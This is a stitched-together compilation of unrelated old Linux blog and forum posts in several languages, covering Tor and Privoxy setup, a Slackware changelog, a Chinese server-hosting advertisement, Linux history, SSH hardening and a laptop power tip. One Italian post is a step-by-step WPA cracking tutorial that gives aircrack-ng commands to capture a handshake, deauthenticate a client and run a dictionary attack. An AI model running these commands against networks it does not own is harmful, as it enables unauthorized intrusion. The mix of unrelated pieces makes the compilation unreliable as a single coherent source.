Restare anonimi in rete oltre ad essere una condizione fondamentale per il rispetto della privacy di un utente è una delle cose più “difficili” da fare.Le informazione riguardanti gli “utenti della rete” hanno un grande valore economico infatti essere perennemente tracciati significa entrare in possesso delle abitudini, delle passioni, del luogo di connesione di un utente internet. Spiego adesso come in semplici passi e possibile evitare tutto questo utilizzando Tor e Privoxy.

Iniziamo con l’installazione di privoxy quindi da terminale digitiamo:

#slapt-get -s privoxy

#slapt-get -i privoxy

Una volta terminata l’installazione di Privoxy passiamo all’installazione di Tor. Scarichiamo e installiamo prima la libreria “libeven” scaricandola da http://www.torproject.org/download.html.it. Una volta scaricata estraiamola e digitiamo da terminale:

#./configure

#make

#make install

Ora passiamo all’installazione vera e propria di Tor. Scarichiamo il file sorgente da questo link http://www.torproject.org/download.html.it e una volta estratto da terminale digitiamo:

#./configure

#make && make install

A questo punto modifichiamo il file in “/etc/privoxy/config”. Elimiamo tutto quello che troviamo all’interno e sostituiamolo con:

forward-socks4a / 127.0.0.1:9050 .
confdir /etc/privoxy
logdir /var/log/privoxy
logfile logfile
actionsfile standard
actionsfile default
actionsfile user
filterfile default.filter

debug 4096
debug 8192
user-manual /usr/share/doc/privoxy/user-manual
listen-address 127.0.0.1:8118
toggle 1
enable-remote-toggle 0
enable-edit-actions 0
enable-remote-http-toggle 0
buffer-limit 4096

Procediamo con la rinomina dei file in /etc/privoxy/ eliminando alla fine dei file standard, trust, user “action”. A questo punto creimo la cartella log quindi da terminale digitiamo:

#mkdir /var/log/privoxy

Come ultimo passaggio installiamo Torbutton da questo link: https://addons.mozilla.org/it/firefox/addon/2275

Buon anonimato a tutti.

n/gnutls-2.6.1-i486-1.tgz: Upgraded to gnutls-2.6.1.
From the gnutls-2.6.1 NEWS file:
** libgnutls: Fix X.509 certificate chain validation error.
[GNUTLS-SA-2008-3] The flaw makes it possible for man in the middle
attackers (i.e., active attackers) to assume any name and trick GNU TLS
clients into trusting that name. Thanks for report and analysis from
Martin von Gagern . [CVE-2008-4989]
For more information, see:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4989
(* Security fix *)
xap/pidgin-2.5.2-i486-2.tgz: Recompiled against gnutls-2.6.1.
extra/ktorrent/ktorrent-2.2.8-i486-1.tgz: Upgraded to ktorrent-2.2.8. \ö/
Thanks to Erik Jan Tromp for pointing this out, and the great use of umlaut.

上海4星级电信机房（真如机房、北艾机房）托管1u 7200/年-13916948721陈峙樾

MSN：yueyue_czy@hotmail.com陈峙樾：13916948721 QQ：329752825

（一） 服务器/主机托管：

上海移动怒江机房机房 

1、上海电信真如/北艾机房 1U：7200/年 2U： 9600/年 4U： 14400/年

（二） 服务器/主机租用：

（三） 免费服务说明

·资深售前工程师免费提供技术方案咨询服务。

·专业技术工程师免费提供IDC机房现场技术服务(网络规划，上架，联线，调试等)，设备监控，紧急状况通知。

·4次/年 免费操作系统安装服务（包含其他常用软件，详见附表）。

·7 X 24 免费无限次网络故障诊断排除服务。

·7 X 24 免费无限次设备重启服务。

·7 X 24 免费无限次授权情况下设备硬件故障诊断服务。

·7 X 24 免费无限次授权情况下设备软件系统维护服务。

·免费参观机房（需提前预约）。

服务响应时间说明:

设备重起服务 5分钟响应 15分钟完成

操作系统/应用软件安装服务 5分钟响应 6小时完成(授权后)

设备硬件故障排除诊断服务 5分钟响应 3小时完成(授权后)

设备软件系统维护服务 5分钟响应 3小时完成(授权后)

（如遇硬件问题或其他异常情况，技术工程师将及时与客户取得联系，通报问题，并商议解决方案和解决时间）

软件安装列表:

操作系统类：Win2000,Win2003,Radhat Linux，Slackware Linux，Debian Linux，FreeBSD，Solaris。应用软件类：SQLServer，MySQL，Oracle，Imail，Winwebmail，Mdaemon/WorldClient，Norton 防病毒软件，卡巴斯基反病毒软件，BLackice 防火墙，Pcanywhere，Radmin，VNC，Apache，Tomcat，Serv-U（只提供授权情况下的代安装服务。软件版权以及LicenseKey由客户提供，由此带来的法律问题由客户承担。）

Tengo molto a mettervi a conoscenza degli aneddoti che sono alla base della nascita del migliore S.O. del pianeta: Linux.

Grazie alla splendida capacità oratoria del mio “collega mod” rosario (che ringrazio molto), sono lieto di esporvi qui, in estrema sintesi, la storia della nascita di Linux ed i capisaldi della sua filosofia.

Buona lettura:

“Sto ricompilando il system sulla mia gentoo ed ho molto tempo per cui provo a descrivere la storia in estrema sintesi di linux; nel forum ho visto molto interesse, curiosità, ma anche confusione.

La filosofia Linux è profondamente diversa da quella a cui siamo abituati. Intanto linux dovrebbe chiamarsi GNU/linux, e vedremo che non è una differenza solo semantica.
La leggenda dice che tutto nasce in un laboratorio del MIT, si usava unix e si era comprata una nuova stampante di rete posta in fondo ad un corridoio; la macchina aveva un imbarazzante problema, ogni tanto s’inceppava la carta, per cui tu credevi di aver stampato, andavi a prendere il documento e vedevi che era tutto fermo.

Un geniale programmatore del MIT pensò: nessun problema, che ci vuole a scrivere un programmino che si accorga del problema ed avverta tutti gli utenti collegati che la carta si è inceppata, in modo che uno degli utenti vada sbloccarla, liberando tutti?

Bisognava avere i sorgenti del driver per aggiungere una manciata di righe al codice, per cui si telefona al produttore e si chiede e quello ti risponde: mi dispiace ma il codice è segreto. Come mi hai venduto un pacco? Voglio migliorarlo e tu mi dici non si può, ho comprato la macchina, ma quello che ci posso fare lo decido tu. E’ pazzesco, pensa il geniale programmatore. E’ come comprare un’automobile, ma poter andare da Roma a Bologna, se vuoi andare a Milano devi chiedere il permesso e forse ti sarà dato.

Così il nostro programmatore si dimette dal MIT e pensa di costruire un sistema che permetta al suo possessore di farne ciò che vuole. Nascono le quattro libertà:

* Libertà di eseguire il programma, per qualsiasi scopo (libertà 0).
* Libertà di studiare come funziona il programma e adattarlo alle proprie necessità (libertà 1).
L’accesso al codice sorgente ne è un prerequisito.
* Libertà di ridistribuire copie in modo da aiutare il prossimo (libertà 2).
* Libertà di migliorare il programma e distribuirne pubblicamente i miglioramenti, in modo tale che tutta la comunità ne tragga beneficio (libertà 3).

L’accesso al codice sorgente ne è un prerequisito.
E’ nato il progetto GNU, così chiama il progetto il suo fondatore il geniale Richard Stallmann, GNU è il simpatico animale simile ad una mucca ma è anche acronimo ricorsivo per “GNU’s Not Unix”; (GNU Non è Unix) e si pronuncia “gh-nu“ (con la g dura).
Insomma si trattava di costruire un sistema che non fosse un marchio registrato, come unix, ma che facesse girare gli applicativi unix e/o funzionasse come unix. Naturalmente bisognava creare un editor per scrivere i programmi nasce EMACS, chiamarlo editor è un eufemismo fa tutto anche il caffè , poi occorreva un compilatore, nasce GCC, e poi un debugger GDB, tutto opera di Stallman sia in eterno ringraziato .

Intanto lo si arrichisce di programmi: una shell, anzi tante shell visto che sono libero di farmi la mia e modificare quelle che ci sono se non mi piacciono, e poi tutto.

Manca solo un kernel; Stallman aveva pensato ad un bel kernel HURD, ma per tanti motivi non è pronto. Per fortuna uno studente, Linus Torvalds, ne ha fatto uno: si chiama Linux. E’ nato per gioco ed in tanti hanno collaborato a renderlo più completo ed efficiente. E’ libero nel senso delle quattro libertà. Si adotta quello, a Stallman non piace lo voleva modulare, ma linux è pronto.

Si parte: è nato Linux o meglio GNU/Linux.

E partono le distribuzioni. Ognuno vuole il suo linux: io lo voglio pulito ed efficiente nasce Slackware, io lo voglio facile, efficiente per poterci lavorare in modo professionale ecco Red Hat, io lo voglio libero, senza pacchetti proprietari, efficiente, sicuro e solido ecco Debian, io lo voglio semplice con configurazioni grafiche ecco prima Mandrake o Suse, poi tutto.

In linux i programmi si compilano, ma è un pò scomodo ci vuole qualcosa di più semplice: ecco rpm (Red-Hat e derivate) o apt (Debian è derivate). Insomma una distribuzione linux è un kernel (propriamente linux)+la shell+ambiente grafico (ce ne è un milione)+script+utility grafiche+applicazioni varie.
Naturalmente ognuno si fa le sue e questo comporta una confusione infernale, perchè io posso prendere un programma, aggiungere funzioni in una libreria, che poi rilascio, ma che potrebbe essere incompatibile con quella che tu hai installato. Apt e Rpm tentano di “risolvere l’inferno delle dipendenze”.

Per qualcuno tutto è troppo confuso, ma per me è libertà, la libertà di scegliere quello che faccio e monto sul mio computer. In realtà come vedete non è scritto da nessuna parte la parola gratuito, posso vendere quello che voglio a patto di rispettare le 4 libertà, cioè chi compra ha il codice sorgente e ci può fare quello che vuole.

“Free as in freedom not as in free beer”. Da li nasce un mondo.”

Commovente vero? Sono curioso di sapere voi che ne pensate

Per chi volesse entrare a far parte della discussione, ecco il link del topic dove rosario ci ha incantati con questa sua eccellente esposizione.

Attendo commenti, da Linuxiani e non

Saluti

Doktor

Attenti ad AVG, l’antivirus che ammazza Windows

… Praticamente user32.dll viene riconosciuto come virus sebbene sia un file fondamentale di Windows! Sono contento di consigliare sempre Antivir come antivirus Qualora ovviamente non si accetti il mio consiglio di passare a Linux! Appena ho tempo voglio dare un’occhiata all’ultima versione di Ubuntu e quasi quasi mi sento pronto per la Slackware.

Ieri sera ho fatto tre assistenze tecniche per amici.

1. Collegare un computer ad Internet attraverso una chiavetta della TIM (ahia). Veniva sempre fuori l’errore 619 e quindi ho chiamato il 119 per avere lumi. Praticamente la SIM non era ancora attiva in ricezione, bisognava fare la classica telefonata di una trentina di secondi. A seguire piccolo corso di conversione da CD a MP3 attraverso CDex e constatazione della mancanza dei driver della scheda video. Intervento da completare.
2. Collegare un computer ad Internet via wireless. La nuova wlanapi.dll del SP3 di Windows XP non aveva delle funzioni a cui il driver della D-Link era abituato. E’ bastato andare nella cartella dove Windows lascia i vecchi file (cartelle che di solito cancello) per ripescare la vecchia wlanapi.dll e metterla nella cartella dei programmi D-Link. Maggiori informazioni qui. A seguire una bella scansione con AdAware data l’apertura di numerose finestre a caso, una ripulita con CCleaner e una deframmentazione.
3. Eliminare da un nuovo portatile Acer con Vista tutte le inutili applicazioni che ci sono su un computer nuovo, impostare l’aspetto classico di Windows e configurare una nuova casella di posta GMail con Thunderbird. Per la prima volta ho messo mano a 4 giga di RAM…

Setelah sempat salah pergaulan di waktu kuliah.. akhirnya aku mengenal dunia LINUX.. dunia yang sempat membuatku pegel-pegel alias “pegel LINUx” hehehe…. gimana g pegel, karena saking senengnya ngoprek..begitu kurang sreg…oprek sana dan sini…akhirnya kena dech yang namanya “KERNEL PANIC” kalo yang keluar dilayar udah seperti itu.. mau gimana lagi, terpaksa dech install ulang, dioprek lagi.. panic lagi.. install lagi.. oprek lagi.. panic lagi… wa… gitulah seterusnya.

Lha karena sekarang aku tidak memiliki fasilitas untuk online di internet 24 jam ( tidak seperti 3 tahun sebelumnya..) makanya saya pengin memilih distro linux yang bener-bener bagus untuk notebookq. Kalau dulu saya suka dengan DEBIAN karena dulu memang begitu mudah untuk melakukan update n upgrage, karena cuman lewat jaringan lokal yakni kebo.vlsm.org. Tapi sekarang saya tidak memiliki fasilitas untuk bisa connect ke internet jadi rada mikir, enaknya pake yang mana ya ?

Saya sudah mencoba beberapa distro linux antara lain keluarga red hat, debian, suse dan slackware. sedikir banyak lumayan mengerti mana yang lebih cocok dengan gaya berlinux yang aku anut, tetapi tetap saja masih binggung mana ya.. distro yang disukai notebookq, beberapa distro yang sedang dalam proses seleksi antara lain :

• Debian
• Ubuntu
• Linuxmint
• Slackware
• Mandriva

ehm.. yang mana ya.?? apa harus dicoba satu persatu semua..?? menurut pembaca distro mana favorit kalian.?

Em um post escrito faz um tempo eu falei um pouco sobre o fish e uma conexão rápida e prática com outro computador Linux e que esta não era segura.

Dê uma lida no post que estou mencionando, ele é pequinino, em pouco tempo você o lê.

Agora que você leu vou lhe dar mais informações sobre o mesmo, afinal, você não achou que alguma coisa no Linux poderia ser insegura desta forma não é.

A primeira coisa que tenho para lhe dizer é que o fish que vimos roda totalmente com base no protocolo ssh, ou seja, tem a capacidade de criar conexões de rede encriptadas. Só isto já é bom, mas não o bastante, vejamos mais.

A primeira coisa que tenho para lhe mostrar é como iniciar, parar ou reiniciar o serviço ssh, sem ele nada disse que estamos vendo funcionará.

No console como root:

/etc/rc.d/sshd start

ou

/etc/rc.d/sshd stop

ou

/etc/rc.d/sshd restart

Este é um dos fatores que determina se o fish funcionará na sua máquina. Caso não esteja conseguindo fazer a conexão, verifique se o serviço ssh está rodando.

Porém não é isto que viemos fazer aqui.

Vamos configurar um pouco do nosso servidor ssh para que “fechemos” mais nossa máquina.

Como root abra o arquivo /etc/ssh/sshd_config

No arquivo informado acima, você pode alterar a porta padrão do ssh (22) para qualquer outro número acima deste. Esta atitude já lhe evita muitos ataques diretos a porta 22, porém não impossibilita o invasor de encontrar o número da porta que está usando apenas dá mais trabalho ao mesmo.

Port 220

Você pode permitir ou não o logon como root.

PermitRootLogin yes

E pode adicionar uma das características que mais gosto, que é permitir que a pessoa só se logue usuários que você permitir, assim se você permitir um usuário sem muitos privilégios, seu computador já estará seguro.

AllowUsers usuario1 usuario2 usuario3

Na minha opinião se a coisa toda parasse por aqui já seria legal, mas tem mais…

No arquivo /etc/hosts.allow você pode colocar exatamente quais IPs, faixa de IPs ou computadores você deseja liberar para acesso ssh. Veja o meu arquivo por exemplo:

#
# /etc/hosts.allow
#

sshd: 150.163.16.13

# End of file

No meu caso, somente o meu notebook tem acesso à minha máquina desktop, todos os outros IPs não importa qual seja são rejeitados. Você poderia também colocar todos os computadores de determinada rede por exemplo:

sshd: 150.163.16.

Assim não só o meu notebook, mas todos os computadores da minha faixa de rede tem acesso a minha máquina.

Isto não é só, você pode liberar todo mundo

sshd: ALL

Ou então liberar de uma faixa de IP até outra por exemplo:

sshd: 150.163.16.1/150.163.16.255

Aqui qualquer IP entre os dois (1..255) é permitido.

Ainda temos o arquivo /etc/hosts.deny, mas confesso que este não é importante pois oque fazemos é negar acesso a todo mundo no arquivo hosts.deny para então ir liberando aos poucos no arquivo hosts.allow.

ALL: ALL: DENY

Seu arquivo hosts.deny deve se parecer com a linha acima.

Lembre-se de a cada mudança de configuração reiniciar o seu serviço sshd.

Creio que isto seja suficiente para proteger seu computador de ataques ssh, mas lembre-se, este mercado cresce diariamente e você tem é que se manter informado para manter-se seguro.

Para se conectar a um computador com o ssh rodando é bem simples, apenas certifique-se que o serviço sshd está rodando, como eu lhes mostrei no início do post.

No konsole, ou qualquer outra linha de comando você pode se conectar através do comando

ssh -p <porta> <usuario>@<servidor>

ssh -p 22 leonardo@150.163.16.52

ssh -p 220 leonardo@leonardom.rede.com.br

Acima três formas de se conectar pelo konsole (linha de comando), onde 22 e 220 é a porta que o ssh está configurado, leonardo é o usuário e 150.163.16.52 é o IP que desejo me conectar que em alguns casos pode ser substítuido pelo nome do computador no grupo de rede. Certifique-se de tentar as duas formas, pois já passei por situações em que o IP não era encontrado, porém o endereço completo sim.

Podemos também nos conectar de forma visual pelo konqueror.

Uma coisa que eu me esqueci de dizer no post anterior é que em alguns casos raros de KDE você tem que permitir o uso do protocolo ssh pelo konqueror, antes de fazer a sua conexão.

Abra o seu konqueror e no Menu, em Configurações, Configurar o Conqueror, Pré-Visualizações e Metadatas libere o protocolo fish.

Então é só digitar na barra de endereços utilizando a mesma sintaxe indicada acima.

fish://leonardo@150.163.16.52

fish://leonardo@leonardom.rede.com.br

Creio ter esmerilhado o assunto em boa parte, caso alguem lembre-se de mais alguma coisa comente que completo o post.

Obrigado a todos.

Come promesso in un mio precedente post ho scritto un piccolo tutorial per “test di sicurezza” effettuati sulle reti wireless. Il problema risulta sempre lo stesso, le chiavi wep possono essere facilmente scavalcate mentre quella wpa…

In questo tutorial vediamo qual’è il metodo per scavalcare, e badate bene, non dico “crackare” o “hackerare” una rete wireless con chiave wpa. Innanzitutto c’è da analizzare il problema vero e proprio, che è l’algoritmo che cifra la psk: è troppo complesso. Nel caso delle chiavi wep, basta mettersi in “ascolto”, usare l’interfaccia in monitor mode, catturare i pacchetti necessari, scovare il mac address di un client connesso all’AP e “fingersi” proprio come si fosse quel pc. In quel momento l’AP ritrasmetterà la richiesta sul nostro client con tanto di pacchetti necessari… e il gioco è fatto… (più o meno…perchè il numero di pacchetti necessari non è certo basso…).

Cmq tornando al discorso sul wpa, il problema della cifratura può essere più o meno scavalcato utilizzando un tipo di attacco chiamato “bruteforce dictionary attack“, che purtroppo funziona solo con wpa e wpa psk. Il tipo di attacco insomma si basa nel “tentare” ricorsivamente l’uso di un dizionario per scovare la password di accesso alla rete. Gli strumenti necessari per questo tipo di azione sono:

1. La suite di Aricrack-NG;
2. Il pacchetto Kismet;
3. Dizionario di password;

In primo luogo dobbiamo verificare se la nostra scheda wireless “cammina” con gli stessi parametri dell’AP, pertanto usiamo la suite Kismet per verificare ciò, selezioniamo il router e vediamo un pò di ricavare le informazioni che ci servono.

Fatto questo cambiamo i parametri della nostra scheda di rete in modo da “associarla” ai valori dell’AP:

# iwpriv eth1 mode 0 1 2 3 dove i numeri stanno a determinate modalità, 0=Automatic; 1=802.11a; 2=802.11b; 3=802.11g, ne scegliamo quindi uno, nel nostro caso sarà lo “0″(zero)

poi settiamo il rate della scheda…il problema è che in alcuni casi nonostante il rate di trasmissione sia uguale non riceviamo l’handshake, mentre settandola ad 1M…si dovrebbe ottenere qualcosa:

# iwconfig eth1 rate 1M

Fatti questi passetti possiamo mettere la nostra scheda di rete in monitor mode,:

# airmon-ng start eth1 7 (dove 7 è il canale in uso nel caso specifico)

Passiamo adesso alla cattura dell’handshake attraverso airodump-ng:

# airodump-ng -c 7 –bssid 00:1B:11:F0:E2:36 -w sniffizzezziamo eth1 (-c 7 è il canale dell’AP; bssid 00:1B:11:F0:E2:36 è il mac address dell’AP; -w sniffizzezziamo è il file sul quale verranno salvati i pacchetti).

Attendiamo che qualche pacchetto venga catturato e diamo il comando:

# aireplay-ng -0 5 -a 00:1B:11:F0:E2:36 -c 00:0e:35:a6:b1:ab eth1 (-0 è il deautantication mode; 5 il numero di pacchetti da mandare; -a 00:1B:11:F0:E2:36 è l’AP; -c 00:0e:35:a6:b1:ab è il pc da “autenticare”; eth1 è la scheda di rete).

Una volta che il client è stato disconnesso, tenterà di riautenticarsi producendo un output…ed è li che avvieremo:

# aircrack-ng -w dizionario -b 00:1B:11:F0:E2:36 sniffizzezziamo.cap (-w dizionario è il nome del file che conterrà le password; sniffizzezziamo.cap è il file con l’estenzione cap di airodump).

Queste sono le procedure per effettuare il crack della rete wpa.
L’output che avremo da Aircrack-NG sarà la password…

Ora, non è che tutti siamo così scemi da usare password semplici…magari qualche pass conterrà caratteri un pò più complessi.

Le distro utilizzate sono Black!Track Linux e Slackware Linux.

Tutti i test effettuati sono per puro e semplice motivo didattico, effettuati sulla rete wifi di casa mia, per scoprirne le vulnerabilità.

L’AP è un DLink DWL-G700AP, la scheda di rete è una ipw2200BG.

UPDATE Lunedì 10.11.08

Ho appena creato un file don dei dizionari password liberamente scaricabile da questo link. Nel file è incluso il sorgente di John The Ripper.

Se non riesci a scarcare il dizionario è perchè a causa delle numerosissime richieste il server U-CLAN va spesso giù. Sarà raggiungibile ogni giorno solo dalle 00.00 alle 08.00.

Per maggiori informazioni leggi questo post.

Siempre pasa que cuando estas trabajando tan alegremente con tu portátil a este se le acaba la batería. Pues bueno, podemos hacer que esto tarde más en pasar con un simple truco el núcleo decida la velocidad del procesador, así cuando no necesite mucha potencia ahorrará considerable energía. Solo tenemos que desinstalar powernowd e instalar cpufreqd.

# apt-get remove powernowd

# apt-get install cpufreqd

Al reiniciar arrancará el servicio cpufreqd controlando así mejor el consumo de nuestro procesador.

Fuente: OcioLinux